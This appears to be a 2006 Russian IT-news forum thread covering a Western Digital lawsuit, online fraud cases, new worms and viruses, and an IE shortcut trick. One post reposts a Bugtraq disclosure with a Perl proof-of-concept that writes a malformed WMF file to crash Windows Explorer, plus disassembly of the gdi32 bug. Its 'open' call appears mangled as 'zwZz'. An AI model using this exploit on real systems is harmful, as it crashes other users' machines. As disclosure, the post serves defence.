Новости из ИТ области

gram

Старожил
хм, а я думал что мне куча отстоя на поиск вылазит, в виде вот таких овт сайтов с кривыми доменами и страницами без содержания, подлец :)
 

Mrak

Старожил
Western Digital вернёт недостающие мегабайты коммерческим ПО Представителям компании-производителя жестких дисков Western Digital удалось урегулировать судебный конфликт с пользователями, которые жаловались на то, что реальная емкость поставляемых WD дисков отличается от заявленной, сообщается на сайте Bit-Tech. Причиной недовольства покупателей стали завышенные WD технические характеристики жестких дисков. В описании продукта в Western Digital указывали емкость жестких дисков, руководствуясь десятичной системой исчисления. То есть, по версии WD, 1 гигабайт равен 1000 мегабайт. При двоичной же системе исчисления 1 гигабайт равен 1024 мегабайтам. Из-за этого несоответствия емкость позиционируемого WD как 120-гигабайтного жесткого диска на самом деле составляет 111 гигабайт. Итогом разбирательства между недовольными клиентами и Western Digital стало предоставление 30-долларовой компенсации в виде программного обеспечения для восстановления утерянных данных. Обратиться за компенсационным ПО обладатели жестких дисков Western Digital могут на веб-сервере компании, введя серийный номер жесткого диска. Компенсации выплачиваются только по жестким дискам произведенным с 22 марта 2001 г. по 15 февраля 2006 г. Выдача компенсации: http://www.westerndigital.com/settlemen ... .asp?ec=98

Добавлено спустя 9 минут 49 секунд:

мда, жмоты таки они...
http://www.ixbt.com/news/hard/index.shtml?06/39/17
Компания Western Digital проиграла судебную тяжбу, которая велась с прошлого года. В ней рассматривался иск одного из пользователей, заявившего, что WD обманула его надписью, гласившей, что объём жесткого диска, им приобретенного, составляет 80 Гб. На деле же вместительность купленного HDD, определяемая операционной системой, составляла 74,4 Гб, или на 5,6 Гб меньше заявленного. Причиной возникновения иска стал разный подход в определении производителем и операционной системой байт в гигабайте - Western Digital (да и не только она) считает Гб равным 109 байтам, в то время программы определяют его как 230, или 1073741824 байт. Последний подход распространен куда более широко и родился раньше первого, однако и тот имеет под собой веское основание. Дело в том, что в 1998 году Международная Электротехническая Комиссия (International Electrotechnical Commission) утвердила гигабайт именно, как 109 байт, что и зафиксировано в системе SI. Этим же документом сказано, что 230 необходимо называть "гибибайт". Суд не внял аргументации Western Digital и определил, что компания должна уплатить 500 тысяч долларов судебных издержек. Кроме того, любой купивший жёсткий диск WD в период между 22 марта 2001 года и 15 февраля 2006 года может претендовать на бесплатное получение на сайте компании программного обеспечения для восстановления файлов, оцениваемого производителем в 30 долларов за копию. Для этого нужно заполнить форму до 17 июля сего года, однако предложение, увы, касается лишь покупателей продукции WD в США. Неясным остался главный вопрос - изменят ли производители в дальнейшем маркировку своих жестких дисков, или же Vista к релизу начнет писать объём в гибибайтах?
 

aleks

Старожил
Mrak":19gcyihe сказал(а):
мда, жмоты таки они...
[url=http://www.ixbt.com/news/hard/index.shtml?06/39/17 сказал(а):
http://www.ixbt.com/news/hard/index.shtml?06/39/17[/url]":19gcyihe]Компания Western Digital проиграла судебную тяжбу, которая велась с прошлого года. Суд не внял аргументации Western Digital и определил, что компания должна уплатить 500 тысяч долларов судебных издержек. Кроме того, любой купивший жёсткий диск WD в период между 22 марта 2001 года и 15 февраля 2006 года может претендовать на бесплатное получение на сайте компании программного обеспечения для восстановления файлов, оцениваемого производителем в 30 долларов за копию. Для этого нужно заполнить форму до 17 июля сего года, однако предложение, увы, касается лишь покупателей продукции WD в США.
а что нам мешает послать серийник в штаты, или они чек прочят?
 

Mrak

Старожил
aleks":5vvxsdvw сказал(а):
а что нам мешает послать серийник в штаты, или они чек прочят?
Ну я думаю проблема в том, что в каждой стране свои серийники... по крайней мере номер партии то они точно должны знать - ну и если есть способ не заплатить человеку 30уе то зачем платить ?..

Добавлено спустя 59 секунд:

Школьник вымогал через интернет $3 млн В Новосибирске задержан школьник, вымогавший через интернет $3 млн у одной из авиакомпаний. Как сообщили РБК в управлении общественных связей МВД России, в адрес одной из крупнейших авиакомпаний России по электронной почте поступило сообщение об угрозе террористических актов в отношении самолетов данной компании. Неизвестный злоумышленник через интернет требовал от владельцев компании выплатить $3 млн за информацию о предполагаемых акциях и лицах, причастных к их организации. Руководство компании обратилось в правоохранительные органы. В результате оперативно-розыскных мероприятий сотрудники управления "К" МВД России установили, что электронное сообщение поступило из Новосибирской области. В дальнейшем была установлена личность преступника. Им оказался 16-летний житель г. Искитим Новосибирской области. Вскоре злоумышленника задержали. В момент задержания юноша попытался уничтожить в компьютере улики, однако сделать этого ему не удалось. Вскоре задержанный дал признательные показания, заявив, что ложное сообщение о планируемых террористических актах направил из корыстных и хулиганских побуждений. Затем он добровольно выдал компьютерную технику, с помощью которой осуществлял доступ в сеть интернет для отправки электронных сообщений. Прокуратурой г. Искитима Новосибирской области возбуждено уголовное дело по ст.207 УК РФ (заведомо ложное сообщение об акте терроризма). Работа авиакомпании продолжена в штатном режиме.
http://www.cnews.ru/news/line/index.sht ... /03/204985
 

Mrak

Старожил
«Трюк» с ярлыками Microsoft — легитимная функция То, что Windows позволяет запускать исполняемый файл при наборе пользователем веб-адреса в Internet Explorer, не является слабым звеном в защите, утверждает Microsoft. Пользователь Windows XP и Internet Explorer может набрать в браузере веб-адрес — такой как http://www.microsoft.com — и тот, вместо того чтобы открыть соответствующий веб-сайт, запустит программу из компьютера пользователя. Этот трюк можно проверить следующим образом: Кликните правой кнопкой мыши на рабочем столе и создайте новый ярлык. Свяжите этот ярлык с какой-нибудь программой, например, c:\windows\system32\calc.exe Назовите этот ярлык http://www.microsoft.com Откройте Internet Explorer и введите в строку адреса http://www.microsoft.com. Если после этого удалить ярлык (или добавить перед "www" в строке адреса браузера символы http://), то IE опять станет выходить в интернет. Во вторник Питер Ватсон, главный консультант по безопасности Microsoft Australia, пояснил ZDNet Australia, что это не ошибка, а нормальная функция, которую можно использовать в легитимных приложениях. «Важно понимать разницу между проблемами безопасности и легитимными функциями. Слабое звено в защите помогает злоумышленникам делать что-то, что им должно быть запрещено. В данном случае это не так, — сказал Ватсон. — Эта возможность, предоставляемая IE, может понадобиться программному обеспечению, которое пользователь легитимно установил на свой компьютер». По словам Ватсона, трюк с ярлыком может использоваться в целях автоматизации. «Например, вам нужно установить dial-up соединение для связи с определенным сайтом. Этому соединению можно присвоить имя connect to mysite.com. Этот пример демонстрирует, как важна гибкость Windows (или другой ОС) для легитимного ПО. Организациям или индивидуальным пользователям может потребоваться автоматизировать процесс обращения приложения к IE. Microsoft считает это одним из преимуществ использования IE в качестве средства доступа, обеспечивающего согласованную и беспрепятственную работу». Однако некоторые аналитики считают эту функцию необязательной и ожидают, что ею воспользуются злоумышленники. Майкл Уоррилоу, директор аналитической фирмы Hydrasight в Сиднее, сказал ZDNet Australia, что он исследовал этот трюк с использованием Windows XP SP2 и обнаружил, что он работает только с IE, но не с Firefox. «Обнаруживаемые то и дело так называемые полезные функции Microsoft создают уязвимости, которые в конечном итоге используются злоумышленниками. И эта не будет исключением», — сказал он. С ним согласен аналитик Frost and Sullivan Australia Джеймс Тернер: «Можно предположить, что авторы вредоносного ПО непременно воспользуются этим — с небольшой добавкой социальной инженерии».
 

amazing

Старожил
Путин призывал к борьбе с кибертеррором 06 июля 2006 года, 12:14 Текст: Эльвира Кошкина 5 июля Владимир Путин предложил разработать глобальную стратегию по борьбе с кибертерроризмом. Об этом президент России заявил на конференции генеральных прокуроров стран Совета Европы, которая проходит в Москве, сообщает агентство "Прайм-ТАСС". Чтобы одолеть преступность в киберпространстве, по мнению Путина, необходимо унифицировать национальные уголовные законодательства. Президент подчеркнул, что борьба с использованием в преступных целях информационно-телекоммуникационных систем сейчас выходит на передний план. Глава государства также выступил за скорейшее вступление в силу Конвенции Совета Европы о предупреждении терроризма. Впервые в международной практике она рассматривает как уголовные преступления подстрекательства к терактам, а также вербовку и подготовку террористов. Россия активно участвовала в разработке этого документа, первым его ратифицировала и уже подготовила пакет изменений в российское законодательство. Эффективная борьба с терроризмом зависит от четкого и неукоснительного соблюдения многосторонних обязательств, взятых всеми без исключения государствами, уверен Президент РФ. Отказы некоторых стран экстрадировать подозреваемых в причастности к террору и предоставление "политического статуса" вероятным террористам Путин назвал труднообъяснимыми.
http://security.compulenta.ru/276379/
 

Mrak

Старожил
У сайта Интерпола появился фальшивый двойник Неизвестные мошенники воссоздали точную копию сайта Интерпола, скопировав на нем порядка 200 МБ информации, для рассылки «выгодных финансовых предложений» от имени этой международной организации. Сервер обнаружили в Китае, что, возможно, вызовет затруднения при его закрытии. По словам представителя голландской компании Ultrascan Advanced Global Investigations, занимающейся расследованием мошенничеств с предложениями перевода денег, так называемыми «аферами 419», это лучший подставной сайт, который им когда-либо доводилось видеть. Сайт, зарегистрированный в декабре от имени Interpol, заработал на прошлой неделе. На нем указан адрес электронной почты, который не является адресом Интерпола в Париже. Настоящий Интерпол предупредил через прессу о том, что организация не занимается финансовыми предложениями и, следовательно, все подобные письма — фальшивки.
 

Mrak

Старожил
Всероссийский чемпионат по информационным технологиям пройдет с 1 августа по 30 сентября 2006 года, сообщается в пресс-релизе оргкомитета. Для участия в чемпионате необходимо зарегистрироваться на сайте Microsoft IT Academy. На первом этапе участники должны будут пройти онлайновые тесты на знание информационных технологий. По результатам каждого теста будут определены 10 победителей (всего 70 победителей), которые получат призы. Для перехода ко второму этапу необходимо набрать не менее 60 процентов правильных ответов на тесте первого этапа. Второй этап чемпионата пройдет на базе учебных центров Microsoft IT Academy, победителей которого также ожидают призы. В чемпионате могут принять участие школьники старших классов, студенты всех форм обучения, аспиранты, а также выпускники вузов, получившие диплом не раньше мая 2005 года, из всех российских регионов. Более подробно с правилами участия и призами можно ознакомиться на офциальном сайте чемпионата. Организаторами являются компании Microsoft, Softline, ZyXEL, Adobe, "Лаборатория Касперского", ПРОМТ и BBK Electronics.
Cайт чемпионата: http://www.it-academy.ru/itacademy2006/ita-rules.asp
 

Mrak

Старожил
Новый вирус атакует Windows PowerShell Создан экспериментальный вирус Cibyz, проникающий в систему через файлообменную сеть и Windows PowerShell. Группа вирусописателей из Австралии создала вирус MSH/Cibyz, нацеленный на Microsoft PowerShell - интерфейс командной строки и скриптовый язык, предназначенный для системного администрирования Windows. MSH/Cibyz способен распространяться через файлообменную сеть Kazaa, заманивая пользователей возможностью скачивания привлекательных продуктов. MSH/Cibyz не использует какой-либо уязвимости PowerShell, а эксплуатирует его функциональную возможность исполнять скрипты. Тем самым новый код похож на batch-вирусы, написанные на Javascript или Visual Basic, команда загрузить которые поступает в систему при исполнении скрипта. Будучи загруженным, MSH/Cibyz устанавливает свою копию в совместно используемую папку Kazaa с целью дальнейшего распространения. "Мораль этой истории такова, что не существует ни одного абсолютно безопасного типа файлов и приложений", - говорит Аллиза Майерс (Allysa Myers), специалист антивирусной компании McAfee, обнаружившей MSH/Cibyz. Новый код не несет разрушительных функций, это скорее исследовательский вирус. Однако в дальнейшем не исключено появление аналогичных MSH/Cibyz кодов с более опасным функционалом. Российские эксперты по информационной безопасности считают, что российским пользователям со стороны MSH/Cibyz ничего не угрожает, во всяком случае пока. "Во-первых, Windows PowerShell - не сильно распространенная оболочка, она довольно нова и не успела завоевать широкую популярность, - комментируют в компании «Доктор Веб». - Во-вторых, ее целевая аудитория - системные администраторы, а не простые пользователи, поэтому, думается, что эпидемий таких вирусов опасаться не стоит, по крайней мере в ближайшее время. Вирусы и черви на скриптовых языках писались и раньше и никаких особых проблем это не вызывало". "Однако, в силу того, что PowerShell - это инструмент системного администрирования, злоумышленник, воспользовавшийся уязвимостью оболочки, сможет получать доступ и контролировать целые компьютерные сети, а не только отдельные машины, - добавляют эксперты "Доктора Веб". - Очевидно, что соблазн в данном случае велик и можно быть уверенными, что подобные Cibyz'у инфекции будут появляться и наносить ущерб, в том числе и российским компаниям, не уделяющим должного внимания безопасности своих ИТ-ресурсов. Далее с появлением Windows с уже предустановленной оболочкой PowerShell, вероятность более широкого распространения инфекций, естественно, увеличится. Однако компания Microsoft уделяет достаточно много внимания безопасности своих продуктов, особенно последнее время, и появление Cibyz сейчас, сделает следующие релизы от Microsoft более надежными". "Говорить о данной угрозе в России на данный момент никакого смысла нет, - заявляет Ольга Кобзарева, руководитель информационной службы "Лаборатории Касперского". - Это коллекционный вирус, причем, насколько нам известно, работающий некорректно. MSH, или PowerShell, в настоящее время находится в процессе разработки (и кстати, насколько мы знаем, Microsoft не собирается включать его в Windows Vista). Сейчас - стадия первого релиз-кандидата, т.е. пользователь должен скачать и установить программное обеспечение вручную. Также пользователю нужно зарегистрироваться, указав свои данные Windows Live ID, чтобы получить доступ к скачиванию с сайта МС. Так что все это означает минимальный риск данной угрозы". Продукт PowerShell, ранее известный под названием Monad, должен выйти в официальной версии позднее в этом году.
http://www.cnews.ru/news/top/index.shtm ... /02/207292

Добавлено спустя 1 минуту 10 секунд:

ещё 1 статья с громким названием... не пропиаришь :wink:
Российские ИТ: будущее под угрозой - http://www.cnews.ru/reviews/articles/in ... /31/207109
 

Mrak

Старожил
WWW исполнилось 15 лет 15 лет назад «отец» Всемирной паутины Тим Бернерс-Ли создал первый в мире веб-сайт. 6 августа 1991 года появился первый в мире веб-сайт — http://info.cern.ch/ (сейчас он в архиве). Его создатель Тим Бернерс-Ли (Tim Burners-Lee) опубликовал на нем описание новой технологии World Wide Web (WWW), основанной на протоколе передачи данных HTTP, системе адресации URI и языке гипертекстовой разметки HTML. Также на сайте были описаны принципы установки и работы веб-серверов и веб-браузеров. Сайт стал и первым в мире интернет-каталогом, так как позже Тим Бернерс-Ли разместил на нем список ссылок на другие сайты. Все инструменты, необходимые для работы первого сайта Бернерс-Ли подготовил еще раньше — в конце 1990 появились первый гипертекстовый веб-браузер WorldWideWeb с функционалом веб-редактора, первый веб-сервер на базе NeXTcube и первые веб-страницы. «Отец» веба считал, что гипертекст может служить основой для сетей обмена данными, и ему удалось претворить свою идею в жизнь. Еще в 1980 году Тим Бернерс-Ли создал гипертекстовое ПО Enquire, использующее для хранения данных случайные ассоциации. Затем, работая в Европейском центре ядерных исследований в Женеве (CERN), он предложил коллегам публиковать гипертекстовые документы, связанные между собой гиперссылками. Бернерс-Ли продемонстировал возможность гипертекстового доступа к внутренним поисковику и документам, а также новостным ресурсам интернета. В результате в мае 1991 г. в CERN был утвержден стандарт WWW. Тим Бернерс-Ли является «отцом» основополагающих технологий веба — HTTP, URI/URL и HTML, хотя их теоретические основы были заложены еще раньше.
http://www.cnews.ru/
 

Mrak

Старожил
Опубликован эксплоит уязвимости Windows В списке рассылки Bugtraq опубликован эксплоит уязвимости семейства ОС Windows, связанной с некорректной обработкой библиотекой gdi32.dll специальным образом сформированного файла в формате WMF. Автор опубликовал исходный код на Perl, позволяющий сформировать подобный файл. В примечании указывается, что автор связывался с разработчиком (Microsoft) ещё 24 июня этого года, однако никакого ответа не получил. В отдельном сообщении описаны детали, позволяющие понять природу уязвимости. Уязвимость проверена в следующих ОС: Windows XP (в том числе с SP1 и SP2), Windows 2003 (в том числе с SP1).
Код:
Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
zwZz(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered
Код:
There is some technical details.

1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

2. Sign extension bug:

GDI32!_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call GDI32!_CreateBrushIndirect
......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

GDI32!_CreateBrushIndirect:
......
......
......
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lbHatch (fake *packedDIB)
call GDI32!_pbmiConvertInfo
......
......
GDI32!_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lbHatch (fake *packedDIB)
......
mov eax, [ebx] ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)

regards,
cyanid-E
http://www.securityfocus.com/
 

gram

Старожил
c wmf уже же была мегадырка. баян или ещё одна?:)
 

Mrak

Старожил
В Иркутске задержаны мошенники международного масштаба, работавшие через Интернет Иркутск. 10 августа. ИНТЕРФАКС-СИБИРЬ - В Иркутске задержана молодая семейная пара и их сообщники, которые на протяжении нескольких лет занимались массовой рассылкой по электронной почте и ICQ предложений по продаже поддельных документов. Как сообщил в четверг агентству "Интерфакс-Сибирь" сотрудник пресс- службы ГУВД Иркутска Герман Струглин, число пострадавших уже превысило тысячу человек. Следственное управление ГУВД Иркутской области возбудило несколько уголовных дел по ст. 159 УК РФ ("Мошенничество"). "Стоимость обычных подделок в среднем составляла порядка 400-500 долларов США, но были и особенные услуги - дипломы "с полной проводкой", когда, якобы, сведения о "выпускнике" образовательного учреждения фиксируются в базе данных выбранного вуза. Цена в этом случае составляла от 2000 до 4000 долларов", - сказал Г.Струглин. Между тем, по имеющейся информации, фактически услуги никому не оказывались, а после получения денежных средств переписка прекращалась. Для этого мошенники создали около 30 электронных адресов, сообщил он. "Кропотливый труд" предприимчивой четы, начатый примерно в 2002 году, принес свои результаты: их сайт и его аналоги были известны не только в России, но и далеко за ее пределами. Пострадавшие от действий мошенников проживают в Англии, Болгарии, Узбекистане, Канаде, Белоруссии, Украине, Казахстане, Австралии, США", - сказал Г.Струглин.
http://www.interfax.ru/r/B/0/0.html?id_issue=11569635

Добавлено спустя 8 минут 37 секунд:

Следующей мишенью спамеров станут RSS-каналы В ходе конференции Black Hat новым направлением спамерских атак были названы RSS-каналы, сообщает Security Pro News. Действительно, RSS-рассылки имеют ряд преимуществ перед рассылками по электронной почте. Специальная программа-агрегатор самостоятельно собирает RSS-сообщения с нужных пользователю сайтов, что практически исключает вмешательство стороннего спамера или злоумышленника. Однако если RSS-канал удастся скомпрометировать, то моментально можно будет забросать мусорными сообщениями с ссылками, например, на вредоносные сайты тысячи подписчиков тех или иных интернет-ресурсов. Как раз этот случай и обсуждался в ходе конференции на секции, посвящённой безопасности RSS. Было показано, что агрегаторы на основе веб чувствительны к инъекциям SQL, выполнению кода и DoS-атакам. В блоге RSS Team представитель Microsoft сказал, что в браузере Internet Explorer 7 и платформе Windows RSS Platform будут исключены эти угрозы, а также связанные с выполнением скриптов в HTML-фрагментах RSS-сообщений. RSS Platform будет вычищать скрипты в поступающих с RSS-ленты сообщениях и сохранять их в RSS Store. Программа-агрегатор, в частности IE7, будет обращаться к RSS Store и показывать сообщения пользователю в режиме Restricted Zone.
http://www.securitypronews.com/insiderr ... cerns.html
 

Mrak

Старожил
Мир на грани эпидемии зомбированных ПК В Сети появились вредоносные программы, использующие критическую уязвимость Windows и превращающие компьютер в "зомби". Специалисты настоятельно рекомендуют установить официальное обновление от Microsoft. В интернете распространяется новый червь, использующий недавно обнаруженную уязвимость Windows для захвата контроля над компьютером. Пораженные им компьютеры становятся частью гигантской сети по рассылке спама. 8 августа Microsoft выпустила большой набор патчей для 23 уязвимостей в Windows и в приложениях из пакета Office. Одна из уязвимостей оказалась столь серьезной, что Департамент национальной безопасности США (DHS) распространил предупреждение о том, что нужно как можно скорее загрузить и установить патч. Теперь компании, занимающиеся компьютерной безопасностью, обнаружили в интернете новый червь, поражающий компьютеры через эту брешь. Червь Mocbot атакует компьютеры, работающие под управлением Windows 2000 или XP, на которых установлен только пакет обновления SP1. "Так как Microsoft лишь на прошлой неделе выпустила патч против этой уязвимости, вероятно, на многих компьютерах с Windows он еще не установлен, и они уязвимы для этого червя", – говорит Кэрол Терио (Carole Theriault), старший консультант по безопасности Sophos. Фирмы, занимающиеся компьютерной безопасностью, обнаружили в интернете две разновидности червя. Аналитик Джо Стюарт (Joe Stewart) из фирмы Lurhq установил, что после установки червь пытается загрузить троянскую программу, которая представляет собой посредника для рассылки спама. Тем временем представители Microsoft заявляют, что ближайшем времени будет повторно выпущен один из патчей, так как при определенных обстоятельствах он приводил к аварийному завершению браузера Internet Explorer. Проблема связана с обновлением MS06-42, исправляющим 8 уязвимостей IE. Она проявляется в браузере IE с установленным первым пакетом обновления при посещении веб-сайтов, на которых используется сжатие данных и широко распространенная версия протокола HTTP 1.1. Представители Microsoft сообщают, что новая версия MS06-42 должна быть готова к 22 августа. А пока для компьютеров, на которых обновление вызывает аварийные сбои, выпущен специальный минипатч.
http://www.cnews.ru/news/top/index.shtm ... /18/208918
 

aleks

Старожил
А что китайцам надо от UDP:1026 & UDP:1027 ломятся неделю... Может кто в курсе?
 

Djonmf

Старожил
Да это они рекламу шлют net send'ом , если фаером комп не защищён и смотрит голым задним местом в сетку, то будут выскакивать сообщения с кнопочкой "ок".
 

Velasqes

Старожил
Да ну нафиг, если служба Мессенджер вырублена, то ничего не будет тебе вываливаться.
 
Верх